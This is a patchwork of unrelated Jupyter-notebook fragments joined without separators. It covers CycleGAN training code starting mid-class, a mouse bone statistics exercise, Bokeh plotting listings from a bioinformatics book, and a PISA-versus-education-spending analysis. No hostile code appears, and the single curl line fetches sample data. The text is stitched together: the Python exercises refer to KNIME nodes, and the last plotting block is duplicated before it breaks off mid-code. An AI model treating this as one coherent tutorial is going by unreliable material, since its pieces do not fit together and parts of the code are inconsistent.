self.decay_start_epoch = decay_start_epoch
def step(self, epoch):
return 1.0 - max(0, epoch + self.offset - self.decay_start_epoch)/(self.n_epochs - self.decay_start_epoch)
lr_scheduler_G = torch.optim.lr_scheduler.LambdaLR(optimizer_G, lr_lambda=LambdaLR(50, 0, 25).step)
lr_scheduler_D_A = torch.optim.lr_scheduler.LambdaLR(optimizer_D_A, lr_lambda = LambdaLR(50, 0 ,25).step)
lr_scheduler_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer_D_B, lr_lambda=LambdaLR(50, 0, 25).step)
```
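The multiplicative factor returned by `LambdaLR.step` stays at 1.0 until `decay_start_epoch` and then decays linearly towards 0 by the final epoch. A quick check of the schedule used here (50 epochs, decay starting at epoch 25), written as a plain function:

```python
# Same decay rule as the LambdaLR class above.
def lr_factor(epoch, n_epochs=50, offset=0, decay_start_epoch=25):
    return 1.0 - max(0, epoch + offset - decay_start_epoch) / (n_epochs - decay_start_epoch)

print(lr_factor(0))               # 1.0 (no decay yet)
print(lr_factor(25))              # 1.0 (decay starts after this epoch)
print(round(lr_factor(40), 2))    # 0.4
print(round(lr_factor(49), 2))    # 0.04 (almost fully decayed)
```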
# Replay Buffer to Hold Previous Generator Outputs During Training
```
from torch.autograd import Variable
import random
class ReplayBuffer():
def __init__(self, max_size=50):
assert (max_size > 0), 'Empty buffer or trying to create a black hole. Be careful.'
self.max_size = max_size
self.data = []
def push_and_pop(self, data):
to_return = []
for element in data.data:
element = torch.unsqueeze(element, 0)
if len(self.data) < self.max_size:
self.data.append(element)
to_return.append(element)
else:
if random.uniform(0,1) > 0.5:
i = random.randint(0, self.max_size-1)
to_return.append(self.data[i].clone())
self.data[i] = element
else:
to_return.append(element)
return Variable(torch.cat(to_return))
fake_A_buffer = ReplayBuffer()
fake_B_buffer = ReplayBuffer()
```
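The buffer logic is independent of torch, so here is a plain-Python sketch of the same behaviour, with integers standing in for image tensors: fill until `max_size`, then with probability 0.5 hand back a stored historical item and replace it with the new one. `MiniReplayBuffer` is an illustrative name, not part of the code above.

```python
import random

class MiniReplayBuffer:
    """Plain-Python analogue of the ReplayBuffer above, for single items."""
    def __init__(self, max_size=50):
        self.max_size = max_size
        self.data = []

    def push_and_pop(self, item):
        if len(self.data) < self.max_size:
            self.data.append(item)   # still filling: pass the item through
            return item
        if random.random() > 0.5:
            i = random.randint(0, self.max_size - 1)
            old, self.data[i] = self.data[i], item
            return old               # return a historical fake, store the new one
        return item                  # otherwise pass the new fake straight through

buf = MiniReplayBuffer(max_size=3)
for k in range(10):
    buf.push_and_pop(k)
print(len(buf.data))  # 3 (the buffer never grows past max_size)
```

Feeding the discriminators from such a buffer stabilises training by showing them a mix of current and older generator outputs.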
# Training of Cycle GAN
```
epochs = 50
for epoch in range(epochs):
for i, data in enumerate(train_loader):
real_A = Variable(data['image'].cuda())
real_B = Variable(data['image_2'].cuda())
# Discriminator targets: a vector of ones/zeros matching the batch size
target_real = Variable(torch.ones(len(data['image'])), requires_grad=False).cuda()
target_fake = Variable(torch.zeros(len(data['image'])), requires_grad=False).cuda()
# (For CPU-only training, drop the .cuda() calls.)
###### Generators A2B and B2A ######
optimizer_G.zero_grad()
# Identity loss
# G_A2B(B) should equal B if real B is fed
same_B = netG_A2B(real_B)
loss_identity_B = criterion_identity(same_B, real_B)* 5.0
# G_B2A(A) should equal A if real A is fed
same_A = netG_B2A(real_A)
loss_identity_A = criterion_identity(same_A, real_A)* 5.0
# GAN loss
fake_B = netG_A2B(real_A)
pred_fake = netD_B(fake_B)
loss_GAN_A2B = criterion_GAN(pred_fake, target_real)
fake_A = netG_B2A(real_B)
pred_fake = netD_A(fake_A)
loss_GAN_B2A = criterion_GAN(pred_fake, target_real)
# Cycle loss
recovered_A = netG_B2A(fake_B)
loss_cycle_ABA = (criterion_cycle(recovered_A, real_A)* 10.0)
# SSIM cycle-consistency term for the A -> B -> A direction
# (detached: it adds a constant to the logged loss, no gradients flow)
with torch.no_grad():
    SSIM_B2A = 1 - ssim_loss(real_A, recovered_A).detach()
recovered_B = netG_A2B(fake_A)
loss_cycle_BAB = (criterion_cycle(recovered_B, real_B)* 10.0)
# SSIM cycle-consistency term for the B -> A -> B direction
# (detached: it adds a constant to the logged loss, no gradients flow)
with torch.no_grad():
    SSIM_A2B = 1 - ssim_loss(real_B, recovered_B).detach()
# Total loss
loss_G = (loss_identity_A + loss_identity_B + loss_GAN_A2B +
loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB + SSIM_B2A + SSIM_A2B)
loss_G = loss_G.float()
loss_G.backward()
optimizer_G.step()
###### Discriminator A ######
optimizer_D_A.zero_grad()
# Real loss
pred_real = netD_A(real_A)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_A = fake_A_buffer.push_and_pop(fake_A)
pred_fake = netD_A(fake_A.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_A = ((loss_D_real + loss_D_fake)*0.5)
loss_D_A.backward()
optimizer_D_A.step()
###################################
###### Discriminator B ######
optimizer_D_B.zero_grad()
pred_real = netD_B(real_B)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_B = fake_B_buffer.push_and_pop(fake_B)
pred_fake = netD_B(fake_B.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_B = (loss_D_real + loss_D_fake)*0.5
loss_D_B.backward()
optimizer_D_B.step()
# Periodically log losses and show sample translations
if (epoch % 1) == 0 and (i % 400) == 0:
print("epoch: %d loss_D_A: %f loss_D_B: %f loss_G: %f ,SSIM_1 :%f SSIM_2: %f \n"
%(epoch, loss_D_A, loss_D_B, loss_G, SSIM_B2A,SSIM_A2B) )
print(epoch)
from matplotlib.pyplot import figure
figure(num=1, figsize=(6, 6))
print('from game image \n')
image = fake_B[0].cpu()
image = (image* .5 + .5)
#plt.imshow(image)
plt.imshow(image.permute(1, 2, 0) )
plt.show()
print('from real image')
figure(num=1, figsize=(6, 6))
image_2 = fake_A[0].cpu()
#plt.imshow(image)
image_2 = (image_2 *.5 + 0.5 )
plt.imshow(image_2.permute(1, 2, 0) )
plt.show()
lr_scheduler_G.step()
lr_scheduler_D_A.step()
lr_scheduler_D_B.step()
```
# Translating Synthetic Image to Real Image
```
epochs = 1
for epoch in range(epochs):
for i, data in enumerate(train_loader):
real_A = Variable(data['image'].cuda())
real_B = Variable(data['image_2'].cuda())
# The siamese comparison was removed; report the SSIM of the translation instead
ssim_val = 1 - ssim_loss(real_A, netG_A2B(real_A))
print("ssim : %f" % ssim_val)
fake_B = 0.5*(netG_A2B(real_A).data + 1.0)
fake_A = 0.5*(netG_B2A(real_B).data + 1.0)
# Save the translated synthetic -> real image
from matplotlib.pyplot import figure
figure(num=1, figsize=(8, 8))
plt.imsave('/home/abhijit/Documents/finalgamee/cycleandssim/' + data['img_2_name'][0] + '.png', (fake_B[0].cpu()).permute(1, 2, 0))
if ( epoch % 5)==0 and (i%400)== 0:
from matplotlib.pyplot import figure
figure(num=1, figsize=(10, 10))
print('from game image \n')
image = netG_B2A(fake_B).detach()
image = image[0].cpu()
image = (image* .5+.5)
#plt.imshow(image)
plt.imshow(image.permute(1, 2, 0) )
plt.show()
```
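The recurring `0.5 * (x + 1.0)` above undoes the usual [-1, 1] (tanh-range) normalisation of generator outputs so the tensors can be saved as images; as a one-line sketch:

```python
# Map a tanh-range generator output back to image range [0, 1].
def denormalize(x):
    return 0.5 * (x + 1.0)

print(denormalize(-1.0), denormalize(0.0), denormalize(1.0))  # 0.0 0.5 1.0
```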
# Exercise 10 - Data frames and Statistics
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import skimage.io as io
```
# 1. Running a basic statistical analysis
## 1.1. Introduction
There are 1000 mouse femur bones which have been measured at high resolution, and a number of shape analyses were run on each sample.
- Phenotypical Information
- Each column represents a metric which was assessed in the images
- CORT_DTO__C_TH, for example, is the mean thickness of the cortical bone
## 1.2. Data preparation
### 1.2.1. Load data into frames
For this example we will start with a fairly complicated dataset from a genetics analysis done at the Institute of Biomechanics, ETHZ.
```
pheno = pd.read_csv('phenoTable.csv')
pheno.head()
```
Genetic Information (genoTable.csv)
Each animal has been tagged at a number of different regions of the genome (called markers: D1Mit236)
- At each marker there are 3 (actually 4) possibilities
- A is homozygous (the same from both parents) from the A strain
- B is homozygous from the B strain
- H is heterozygous (one from A, one from B)
- ‘-’ is a missing or erroneous measurement
```
geno = pd.read_csv('genoTable.csv')
geno.head(5)
```
### 1.2.2. [Merge data frames](https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html)
We want to merge the data set using the key 'ID'
```
df = pd.merge(pheno,geno, on='ID')
df.head()
```
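A minimal, self-contained illustration of the same inner merge on 'ID' (toy frames with invented values):

```python
import pandas as pd

pheno_toy = pd.DataFrame({'ID': [1, 2, 3], 'BMD': [0.9, 1.1, 1.0]})
geno_toy = pd.DataFrame({'ID': [1, 2, 4], 'D1Mit236': ['A', 'H', 'B']})

# The default inner merge keeps only IDs present in both tables (here: 1 and 2).
merged = pd.merge(pheno_toy, geno_toy, on='ID')
print(merged)
```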
### 1.2.3. Rename a column
The key 'FEMALE' is a boolean, we want to change the key name to 'GENDER' and the contents from true/false to 'F'/'M'. Here, a [lambda function](https://realpython.com/python-lambda/) is used for the mapping when we apply an operation to each row in the GENDER column.
```
df=df.rename(columns={"FEMALE": "GENDER"})
df['GENDER'] = df['GENDER'].apply(lambda x: 'F' if x else 'M')
df['GENDER'].sample(5)
```
## 1.3. Tasks
### 1.3.1 First inspection
1. Look at the histograms of the available variables in the phenotype data.
```
fig,ax=plt.subplots(1,1,figsize=(15,15));
pheno.hist(ax=ax,bins=50);
```
These are far too many variables to work with. At least for a start. We have to focus on some few e.g.
- Bone mineral density (BMD)
- Cortical bone thickness (CORT_DTO_TH)
- Cortical bone Microstructural thickness (CORT_DTO_TH_SD)
### 1.3.2 Look at the pair plot
Explore the data and correlations between various metrics by using the ‘pairplot’ plotting component. Examine different variable combinations.
```
sns.pairplot(pheno, vars = ['BMD', 'CORT_DTO__C_TH', 'CORT_DTO__C_TH_SD']);
```
3. For the rest of the analysis you can connect the various components to the ‘Column Filter’ node since that is the last step in the processing
4. Use one of the T-Test to see if there is a statistically significant difference between Gender’s when examining Cortical Bone Microstructural Thickness (Mean) ```CORT_DTO__C_TH```
- Which value is the p-value?
- What does the p-value mean, is it significant, by what criterion?
```
from scipy.stats import ttest_ind
# Extract the CORT_DTO__C_TH column and create a data frame for FEMALE and MALE respectively using the GENDER column
male = df[...][...]    # insert your gender filter, then select the column to compare
female = df[...][...]  # insert your gender filter, then select the column to compare
ttest,pval = ttest_ind(female,male)
print("p-value={:0.4f}".format(pval))
```
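One possible completion, sketched on synthetic data so it runs standalone (the column names follow the text above; the numbers are invented for illustration):

```python
import numpy as np
import pandas as pd
from scipy.stats import ttest_ind

# Synthetic stand-in for the merged frame: a GENDER column and one metric.
rng = np.random.default_rng(0)
toy = pd.DataFrame({
    'GENDER': ['F'] * 50 + ['M'] * 50,
    'CORT_DTO__C_TH': np.concatenate([rng.normal(0.20, 0.02, 50),
                                      rng.normal(0.22, 0.02, 50)]),
})
female = toy[toy['GENDER'] == 'F']['CORT_DTO__C_TH']
male = toy[toy['GENDER'] == 'M']['CORT_DTO__C_TH']
ttest, pval = ttest_ind(female, male)
print("p-value={:0.4f}".format(pval))
```

On the real `df`, the same two filter lines apply unchanged.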
5. Use another node from the Hypothesis Testing section to evaluate the effect on the D16Mit5 on the Lacuna Distribution Anisotropy? Is it significant?
```
# Insert your test code here
```
### 1.3.3. Questions
1. In the ‘Independent Groups T-Test’ node we can run a t-test against all of the columns at the same time, why SHOULDN’T we do this?
2. If we do, how do we need to interpret this in the results
3. Is p<0.05 a sufficient significance criterion?
# 2. Comparing two real bone samples
For this example we will compare two real cortical bone samples taken from mice.
For the purpose of the analysis and keeping the data sizes small, we will use Anders' Crazy Camera for simulating the noisy detection process.
The assignment aims to be more integrative and you will combine a number of different lectures to get to the final answer.
### Preparing the data
```
imgA = (0.0 < io.imread('bone_7H3A_B1.tif')).astype(float)
imgB = (0.0 < io.imread('bone_7H6A_B2.tif')).astype(float)
plt.hist([imgA.ravel(), imgB.ravel()],bins=2);
```
This is the code to simulate a bad camera that produces bad images
```
import numpy as np
import skimage.filters as filters

def camera(img, blurr=1.0, noise=0.1, illum=0.0):
    # Blur, then add Gaussian noise; illum is accepted but unused in this simple model
    res = filters.gaussian(img, sigma=blurr)
    res = res + np.random.normal(size=res.shape, loc=0, scale=noise)
    return res

def crappyCamera(img):
    return camera(img, blurr=2.0, noise=0.2, illum=0.0)
cimgA=crappyCamera(imgA)
cimgB=crappyCamera(imgB)
fig, (ax1,ax2) = plt.subplots(1,2,figsize=(12,7))
ax1.imshow(cimgA[100])
ax2.imshow(cimgB[100])
```
## 2.1. Questions
1. We want to know if there is a statistically significant difference in
- cell volume
- cell shape
- cell density
between the two samples given the variation in the detector
1. which metric do we need here?
2. why?
2. We see in the volume comparison (Volume/Num Pixels) a very skewed representation of the data
 - why is this? (Hint: check the segmented images)
 - What might be done to alleviate it? (Hint: Row Filter)
## 2.2. Hints
1. Look at the kind of noise (you can peek inside the Crappy Camera) to choose the proper filter
2. Use an automated thresholding technique for finding the bone
3. To do this we will need to enhance the image, segment out the bone (dense) tissue, and find the mask so that we can look at the cells.
4. We then need to label the cells and analyze their volume and shape
5. By using morphology and strongly filtering parameters, it might be possible to maximize the differences between the groups
6. Create a data frame with columns for sample_id, item_id and metric. Look for ideas in the previous exercises and lectures.
# 3. T-Test Simulator
This exercise (workflow named - Statistical Significance Hunter) shows the same results as we discussed in the lecture for finding p-values of significance.
It takes a completely random stream of numbers with a mean 0.0 and tests them against a null hypothesis (that they equal 0) in small batches, you can adjust the size of the batches, the number of items and the confidence interval. The result is a pie chart showing the number of “significant” results found using the standard scientific criteria for common studies.
### T-test for single value $\mathcal{H}_0$
```
from scipy.stats import ttest_1samp
data= np.random.normal(size=(100,3),loc=0,scale=1.0)
tset, pval = ttest_1samp(data, 0.0) # Test if data has average = 0
print("p-values",pval)
reject = pval < 0.05
print("Reject : ", reject)
for idx,r in enumerate(reject) :
if r : # alpha value is 0.05 or 5%
print("[x] we are rejecting null hypothesis")
else:
print("[v] we are accepting null hypothesis")
def statSignificanceHunter(batches=10,samples=10) :
testLevels=[0.05,0.01]
data= np.random.normal(size=(samples,batches),loc=0,scale=1.0)
tset, pval = ttest_1samp(data, 0.0)
counts=[np.sum(testLevels[0]<=pval),np.sum(pval<testLevels[0])-np.sum(pval<testLevels[1]),np.sum(pval<testLevels[1])]
return pval, counts
pvals, counts = statSignificanceHunter(batches=100,samples=100)
plt.figure(figsize=(12,8))
plt.pie(counts,labels=['Accepted','0.05 Reject','0.01 Reject']); plt.legend();
```
## 3.1. Task
A single run is not sufficient to draw a conclusion; we need to repeat it.
Write a program that tests the random data with different batch sizes. You need:
1. Loops over batch size and number of samples (in case you want to test different sizes)
2. A loop that repeats the loops to get some statistics
3. Store the data in a data frame
```
# Your code here
```
## 3.2. Questions
1. If we change the size of the chunks to the same as the number of elements in the list do we still expect to find ‘significant’ (<0.05) values? Why or why not?
2. How does comparing against the null hypothesis being 0 relate to comparing two groups?
3. How does comparing a single column compare to looking at different metrics for the same samples?
4. What is bonferroni correction (hint: wikipedia) and how could it be applied to this simulation?
Make the modification needed
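For question 4, the key arithmetic is simple: testing m hypotheses at level α yields roughly α·m false positives under the null, and the Bonferroni correction tests each hypothesis at α/m instead. A sketch:

```python
# With m independent tests at level alpha, about alpha * m "significant"
# results are expected by chance alone; Bonferroni shrinks the per-test level.
alpha, m = 0.05, 100
expected_false_positives = alpha * m   # ~5 spurious rejections
bonferroni_alpha = alpha / m           # 0.0005 per-test threshold
print(round(expected_false_positives), round(bonferroni_alpha, 6))
```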
# 4. Grammar of Graphics Plots
This is a walk through demonstration using ggplot instead of matplotlib for plotting data.
## 4.1. Introduction
Making plots or graphics should be divided into separate independent components.
- Setup is the ggplot command and the data
- Mapping is in the aes command ```ggplot(input data frame,aes(x=name of x column,y=name of y column))+```
- Plot is the next command (geom_point, geom_smooth, geom_density, geom_histogram, geom_contour) ```geom_point()+```
- Coordinates can then be added to any type of plot (coord_equal, coord_polar, etc)
- Scales can also be added (scale_x_log10, scale_y_sqrt, scale_color_gradientn)
- Labels are added labs(x="x label",y="y label",title="title")
## 4.2. Tasks
1. Load the necessary libraries
```
from plotnine import *
from plotnine.data import *
```
2. Load the phenoTable from the first exercise
```
pheno = pd.read_csv('phenoTable.csv')
pheno2 = pheno[['ID','BMD','MECHANICS_STIFFNESS','CORT_DTO__C_TH','CORT_DTO__C_TH_SD']]
pheno2.head()
```
- Set up the input table as ```pheno``` and the mapping with the x position mapped to BMD (Bone Mineral Density) and the y position to CT_TH_RAD (Cortical Bone Thickness)
- Create the first simple plot by adding a point representation to the plot
```
ggplot(pheno,aes(x="BMD",y="CT_TH_RAD")) \
+ geom_point()
```
- Change color of the points to show if the animal is female or not (in the mapping)
```
ggplot(pheno,aes(x="BMD",y="CT_TH_RAD",color="FEMALE"))+geom_point()
```
- Show the color as a discrete (factor) value instead of a number
- First we need some data frame manipulation to change the boolean 0/1 into labels.
```
m=pheno
m=m.rename(columns={"FEMALE": "GENDER"})
m['GENDER'] = m['GENDER'].apply(lambda x: 'F' if x else 'M')
ggplot(m,aes(x="BMD",y="CT_TH_RAD",color="GENDER"))+geom_point()
```
- Make the plot in two facets (windows) instead of the same one
```
ggplot(m,aes(x="BMD",y="CT_TH_RAD",color="GENDER")) \
+ geom_point() \
+ facet_wrap("GENDER")
```
For more information and tutorial read about it in: http://ggplot2.org/
## Task: Finalize the figures with decorations
The previous plots are not publication ready, explore the different plot grammar components to add decorations
- Plot is the next command (geom_point, geom_smooth, geom_density, geom_histogram, geom_contour) geom_point()+
- Coordinates can then be added to any type of plot (coord_equal, coord_polar, etc)
- Scales can also be added (scale_x_log10, scale_y_sqrt, scale_color_gradientn)
- Labels are added labs(x="x label",y="y label",title="title")
Python for Bioinformatics
-----------------------------

This Jupyter notebook is intended to be used alongside the book [Python for Bioinformatics](http://py3.us/)
**Note:** Before running the listings, the sample files should be accessible from this Jupyter notebook. The following commands will download these files from GitHub and extract them into a directory called samples.
Chapter 14: Graphics in Python
-----------------------------
**USING BOKEH**
```
!curl https://raw.githubusercontent.com/Serulab/Py4Bio/master/samples/samples.tar.bz2 -o samples.tar.bz2
!mkdir samples
!tar xvfj samples.tar.bz2 -C samples
```
**Listing 14.1:** basiccircle.py: A circle made with Bokeh
```
from bokeh.plotting import figure, output_file, show
p = figure(width=400, height=400)
p.circle(2, 3, radius=.5, alpha=0.5)
output_file("out.html")
show(p)
```
**Listing 14.2:** fourcircles.py: 4 circles made with Bokeh
```
from bokeh.plotting import figure, output_file, show
p = figure(width=500, height=500)
x = [1, 1, 2, 2]
y = [1, 2, 1, 2]
p.circle(x, y, radius=.35, alpha=0.5, color='red')
output_file("out.html")
show(p)
```
**Listing 14.3:** plot1.py: A minimal plot
```
from bokeh.plotting import figure, output_file, show
x = [1, 2, 3, 4, 5, 6, 7, 8]
y = [.7, 1.4, 2.1, 3, 3.85, 4.55, 5.8, 6.45]
p = figure(title='Mean wt increased vs. time',
x_axis_label='Time in days',
y_axis_label='% Mean WT increased')
p.circle(x, y, legend='Subject 1', size=10)
output_file('test.html')
show(p)
```
**Listing 14.4:** plot2.py: Two data series plot
```
from bokeh.plotting import figure, output_file, show
x = [1, 2, 3, 4, 5, 6, 7, 8]
y = [.7, 1.4, 2.1, 3, 3.85, 4.55, 5.8, 6.45]
z = [.5, 1.1, 1.9, 2.5, 3.1, 3.9, 4.85, 5.2]
p = figure(title='Mean wt increased vs. time',
x_axis_label='Time in days',
y_axis_label='% Mean WT increased')
p.circle(x, y, legend='Subject 1', size=10)
p.circle(x, z, legend='Subject 2', size=10, line_color='red',
fill_color='white')
p.legend.location = 'top_left'
output_file('test.html')
show(p)
```
**Listing 14.5:** fishpc.py: Scatter plot
```
from bokeh.charts import Scatter, output_file, show
import pandas as pd

df = pd.read_csv('samples/fishdata.csv', index_col=0)
scatter = Scatter(df, x='PC1', y='PC2', color='feeds',
marker='species', title=
'Metabolic variations based on 1H NMR profiling of fishes',
xlabel='Principal Component 1: 35.8%',
ylabel='Principal Component 2: 15.1%')
scatter.legend.background_fill_alpha = 0.3
output_file('scatter.html')
show(scatter)
```
**Listing 14.6:** heatmap.py: Plot a gene expression file
```
from bokeh.charts import HeatMap, bins, output_file, show
import pandas as pd
DATA_FILE = 'samples/GSM188012.CEL'
dtype = {'x': int, 'y': int, 'lux': float}
dataset = pd.read_csv(DATA_FILE, sep='\t', dtype=dtype)
hm = HeatMap(dataset, x=bins('x'), y=bins('y'), values='lux',
title='Expression', stat='mean')
output_file("heatmap7.html", title="heatmap.py example")
show(hm)
```
**Listing 14.7:** chord.py: A Chord diagram
```
from bokeh.charts import output_file, Chord
from bokeh.io import show
import pandas as pd
data = pd.read_csv('samples/test3.csv')
chord_from_df = Chord(data, source='name_x', target='name_y',
value='value')
output_file('chord.html')
show(chord_from_df)
```
---
<h1><center><font color='#82ad32'>Public Spending on Education vs. PISA Performance</font></center></h1>
---
Link to the presentation [here](https://drive.google.com/file/d/1Yio6a-DK5tmZ_Wa7uIHvt-6I2OKgyPlr/view?usp=sharing)
The goal of this work is to assess possible correlations between a country's public spending on education and the performance of that country's students in the Programme for International Student Assessment (PISA). All the required data was downloaded from the OECD data site [here](https://data.oecd.org/), where the history of the relevant indicators is available in ```.csv``` format.
Note that by public spending on education we mean the percentage of GDP the country invests in primary and secondary education. A country's PISA performance, in turn, refers to its score on the test and is split into three datasets, one for each assessed knowledge area: Reading, Mathematics, and Science. More information about PISA can be found [here](http://portal.inep.gov.br/pisa), on the INEP website.
### <font color='#82ad32'>Outline</font>
0. Importing Libraries and Visual Styling
1. Loading the Data
2. Cleaning the Data
3. Merging the Data
4. Exploratory Data Analysis
5. Correlation between Public Spending on Education and PISA Performance
---
## <font color='#82ad32'>0. Importing Libraries and Visual Styling</font>
```
import numpy as np
import pandas as pd
import seaborn as sns
import plotly.express as px
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Visual styling
plt.rcParams['font.family'] = 'monospace'
plt.rc("axes.spines", top=False, right=False, left=False)
grey = '#363636'
plt.rcParams['axes.linewidth'] = 0.3
plt.rcParams['axes.edgecolor'] = grey
plt.rcParams['xtick.color'] = grey
plt.rcParams['ytick.color'] = grey
```
---
## <font color='#82ad32'>1. Loading the Data</font>
```
# Public spending on education
gp_educ = pd.read_csv('gasto_publico_educ_00-15.csv')
# PISA performance
# Mathematics
pisa_m = pd.read_csv('pisa_mat_03-18.csv')
# Reading
pisa_l = pd.read_csv('pisa_leitura_00-18.csv')
# Science
pisa_c = pd.read_csv('pisa_sci_06-18.csv')
# Keys to join the data with their countries and continents
gapminder_keys = px.data.gapminder()[['country',
'continent',
'iso_alpha']
].drop_duplicates().reset_index(drop=True)
```
---
## <font color='#82ad32'>2. Cleaning the Data</font>
```
# Keep only the relevant columns
gp_educ.drop(['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
pisa_m.drop( ['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
pisa_l.drop( ['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
pisa_c.drop( ['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
# With this, every dataset contains only the country name, the indicator value, and the year.
# Rename the columns for convenience
gp_educ.columns = ['country','Ano','Gasto Educ (%)']
pisa_m.columns = ['country','Ano','Nota Matemática']
pisa_l.columns = ['country','Ano','Nota Leitura']
pisa_c.columns = ['country','Ano','Nota Ciências']
gapminder_keys.columns = ['País', 'Continente', 'country'] # 'country' becomes the iso_alpha code
# Check that the columns are being read correctly. Ano (year) and the values should be read
# as integers (int) or floats (float)
print(gp_educ.dtypes)
print()
print(pisa_m.dtypes)
print()
print(pisa_c.dtypes)
print()
print(pisa_l.dtypes)
```
---
## <font color='#82ad32'>3. Merging the Data</font>
```
# To merge the datasets we need a reference column. Since each value refers to a country and
# a year simultaneously, we concatenate the country column with the year column. This combined
# column can then be used to join the datasets without loss of information.
gp_educ['País-Ano'] = gp_educ['country'] + '-' + gp_educ['Ano'].astype(str)
pisa_m['País-Ano'] = pisa_m['country'] + '-' + pisa_m['Ano'].astype(str)
pisa_l['País-Ano'] = pisa_l['country'] + '-' + pisa_l['Ano'].astype(str)
pisa_c['País-Ano'] = pisa_c['country'] + '-' + pisa_c['Ano'].astype(str)
# Stack the datasets
base = pd.concat([gp_educ,pisa_m,pisa_l,pisa_c],axis=0,sort=False)
# At this point 'base' is stacked but has repeated País-Ano values
# (two rows for Brasil-2005, for example).
# To get a single row per country-year, we group the data on the País-Ano column using min as
# the aggregation. Any other function would do, since there is only one value of each indicator
# per country-year: min([nan, nan, x]) equals max([nan, nan, x]), because NaN values are skipped.
base_group = base.groupby('País-Ano').min()
base_group = base_group.merge(gapminder_keys, on='country', how='left')
```
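The effect of the `groupby('País-Ano').min()` step, which collapses the stacked indicator rows into one row per country-year (min skips NaN), can be seen on a toy frame with invented values:

```python
import pandas as pd

# Two stacked rows for the same country-year, each filling a different indicator.
toy = pd.DataFrame({
    'País-Ano': ['BRA-2005', 'BRA-2005'],
    'Gasto Educ (%)': [4.0, None],
    'Nota Matemática': [None, 356.0],
})
collapsed = toy.groupby('País-Ano').min()
print(collapsed)  # a single BRA-2005 row holding both indicator values
```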
---
## <font color='#82ad32'>4. Exploratory Data Analysis</font>
Let's see how many entries exist per continent.
```
base_group.groupby(['País',
'Continente'],
as_index=False).count()[['País',
'Continente']].groupby('Continente').count()
```
As can be seen, most of the countries are European. We also saw that Africa has only one country in the data, even though the continent has many more. We therefore decided to omit Africa from the dataset: besides being the only one, the country in question is South Africa, which is [the third richest country on the continent](https://en.wikipedia.org/wiki/List_of_African_countries_by_GDP_(nominal)) and therefore not representative.
```
base_group = base_group[base_group['Continente']!='Africa']
```
With that done, let's try to understand the behavior of the data. First of all, let's look at the descriptive statistics.
```
base_group.describe()[['Gasto Educ (%)', 'Nota Matemática', 'Nota Leitura','Nota Ciências']]
```
We notice that the counts of the columns are not equal. This means that not every indicator exists for every year and every country, which is a problem: we will have to deal with these gaps.
As for public spending on education, there is a wide range, from 1.5% to 5.1% of GDP invested, with a mean of 3.29%.
The PISA scores, on the other hand, have very similar means, between 485 and 490 points, and very similar distributions.
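One quick way to quantify such gaps is to count missing values per column; a toy illustration:

```python
import pandas as pd

toy = pd.DataFrame({
    'Gasto Educ (%)': [3.1, None, 4.2],
    'Nota Matemática': [None, None, 389.0],
})
print(toy.isna().sum())  # per-column count of missing entries
```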
```
base_group_country = base_group.groupby(['País','country']).mean().reset_index()
# Visualize the distributions of these columns.
fig = plt.figure(figsize=(20,10))
# Create a matplotlib figure canvas
gs = gridspec.GridSpec(3, 3, wspace=0.2, hspace=0.3,figure=fig)
# Create the sub-plots (1 large, 3 smaller)
# The code below forces the PISA charts to share the same x-axis.
ax0 = fig.add_subplot(gs[0, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Matemática')
ax1 = fig.add_subplot(gs[1, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Leitura')
ax2 = fig.add_subplot(gs[2, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Ciências')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(0,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
ax0.axes.get_xaxis().get_label().set_visible(False)
ax1.axes.get_xaxis().get_label().set_visible(False)
ax2.axes.get_xaxis().get_label().set_visible(False)
ax0.axes.get_yaxis().get_label().set_visible(False)
ax1.axes.get_yaxis().get_label().set_visible(False)
ax2.axes.get_yaxis().get_label().set_visible(False)
ax3.axes.get_yaxis().get_label().set_visible(False)
# Plot the charts.
g3 = sns.barplot(data=base_group_country.sort_values('Gasto Educ (%)',ascending=False)[:7],x='Gasto Educ (%)',y='País',
ci=0,ax=ax3,palette=sns.color_palette("OrRd", 10)[::-1])
g3.tick_params(axis="y",direction="out", pad=-100,colors='white',labelsize=15)
g0 = sns.barplot(data=base_group_country.sort_values('Nota Matemática',ascending=False)[:5],y='Nota Matemática',x='País',
ax=ax0,palette=sns.color_palette("YlGn", 10)[3:][::-1])
g0.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=11)
g1 = sns.barplot(data=base_group_country.sort_values('Nota Leitura',ascending=False)[:5],y='Nota Leitura',x='País',
ax=ax1,palette=sns.color_palette("PuBu", 10)[5:][::-1])
g1.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=11)
g2 = sns.barplot(data=base_group_country.sort_values('Nota Ciências',ascending=False)[:5],y='Nota Ciências',x='País',
ax=ax2,palette=sns.color_palette("YlOrBr", 10)[5:][::-1])
g2.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=11)
fig.suptitle('Países com Maiores Valores',fontsize=20)
plt.show()
base_group_country = base_group.groupby(['País','country']).mean().reset_index()
# Visualize the distributions of these columns.
fig = plt.figure(figsize=(20,10))
# Create a matplotlib figure canvas
gs = gridspec.GridSpec(3, 3, wspace=0.2, hspace=0.3,figure=fig)
# Create the sub-plots (1 large, 3 smaller)
# The code below forces the PISA charts to share the same x-axis.
ax0 = fig.add_subplot(gs[0, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Matemática')
ax1 = fig.add_subplot(gs[1, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Leitura')
ax2 = fig.add_subplot(gs[2, 1:])
